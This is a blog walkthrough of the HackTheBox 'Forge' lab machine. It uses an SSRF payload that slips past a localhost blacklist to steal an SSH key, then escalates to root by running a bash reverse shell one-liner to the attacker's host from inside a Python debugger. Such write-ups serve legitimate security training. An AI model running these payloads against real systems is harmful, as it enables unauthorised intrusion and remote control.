In this post, I would like to share a walkthrough of the Forge Machine from HackTheBox
This room has been considered difficulty rated as a medium machine on HackThebox
Source: Hack the Box
What will you gain from the Forge machine?
For the user flag, you will execute some SSRF attack on the website to fetch any useful information from the server
As for the root flag, you need to run some PDB Python code where it is coming from the SUID file
Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
# Nmap 7.91 scan initiated Sat Sep 11 23:31:29 2021 as: nmap -sV -sC -oA intial -Pn 10.129.210.60 Nmap scan report for 10.129.210.60 Host is up (0.19s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp filtered ftp 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA) | 256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA) |_ 256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519) 80/tcp open http Apache httpd 2.4.41 |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Did not follow redirect to http://forge.htb Service Info: Host: 10.129.210.60; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Sep 11 23:32:11 2021 -- 1 IP address (1 host up) scanned in 42.51 seconds
We managed to sight a few ports open such as:
- 21 – ftp
- 22 – ssh
- 80 – http
Let’s try to access the website interface
Nothing that can interest me expect to Upload an Image
Before accessing the “Upload an Image”, we can enumerate the directory that can be found on the original domain.
However, there is no interesting directory that we can access
On the “Upload an Image” page, we managed to see two functions Upload local file and Upload from URL.
I have tried to upload some random files and received responses as shown above.
After a while, I managed to get some useful files from forge.htb/announcement
We got the link and let’s try to download on our machine.
Inside the file, we managed to gather a lot of information such as credentials and some ports been clarified open on the machine.
I have tried to access the machine via FTP but sadly, we found a dead-end via FTP.
I have been stuck here on the FTP access and I have some thought that there might be some subdomain for the machine. As a result, let’s enumerate the subdomain (if any) via gobuster vhost function
After a few minutes, we managed to notice there’s admin.forge.htb which provides some status 200
Sadly, we see some text “Only localhost is allowed!” which we again stuck with it.
Gaining Privileges Access
On the burp suite request for the Upload function, I notice that there’s some code (url=test.com&remote=1) after SoC-GPC
Let’s do some research on the attack which I believe is an SSRF attack
Let’s review what we have obtained until right now:
- Subdomain: admin.forge.htb (only localhost is allowed)
- ftp,ftps,http,https is open on the machine which opens to localhost
- Credential information such as (username=user, password=heightofsecurity123!)
SSRF attack on forge.htb
Let’s apply the SSRF that we learn from portswigger.net onto the website interface on BurpSuite Request
We can insert the payload on the filled-up table such as shown above.
The payload would be something like http://admin.FORGE.HTB/upload?u=ftp://user:firstname.lastname@example.org/.ssh/id_rsa&remote=1 (Where I try to obtain ssh id_rsa)
From the inspection of the Burpsuite, we move to the repeater to understand the flow of the process. However, there’s an error like “URL contains a blacklisted address!”
Let’s try to change the subdomain to ADMIN.FORGE.htb and use other replacements for localhost such as 127.0.0.3
Voila! Finally, we got the link to download something from the machine.
Let’s retrieve the file using wget so that we can read the content of the file.
After multiple tries, we can retrieve the ssh id_rsa
Let’s access the machine via SSH service using the ssh id_rsa that we obtain previously
Maintaining Privileges Access on Forge Machine
At last, we are able to access the machine.
You can read the user flag by typing the “cat user.txt” command
Escalate to Root Privileges Access
In order to escalate to the root privileges access, we need to find out the SUID that we can abuse. For us to get that SUID file, we can run a simple command such as “sudo -l“
We need to understand the SUID by reading the context of the file. I notice there’s a password (secretadminpassword) that we might be using in the future.
Without further ado, let’s try to run the SUID file and I notice the output is quite like nc function
There might be something to get the response from the machine.
Let’s try to open another ssh session on a different terminal.
We should try to telnet the localhost with the given port from the SUID file. Oh wow! It works and they are asking for the secret password which might be the password that we obtain from inside the SUID file
Gotcha! Now, let’s enter any character that is not mentioned over here.
We were able to get a response on the SUID file. From my experience, PDB might be a Python Debugger
However, it doesn’t do any harm to double-check on the internet
It’s a Python Debugger as I expected.
We cannot execute any Python code on PDB before the NC listener will need to be started
Let’s run a simple python code that will get a reverse shell connection back to us.
For Instance, the code can be seen below
import os os.system("bash -c 'bash -i >& /dev/tcp/<Your IP>/<Port> 0>&1'")
Success! We now have a root Reverse Shell Connection back to us
As usual, we can read the root flag by executing the “cat /root/root.txt” command
Happy Learning Guys!
We can go to /etc/shadow so that we can unlock and read the write-up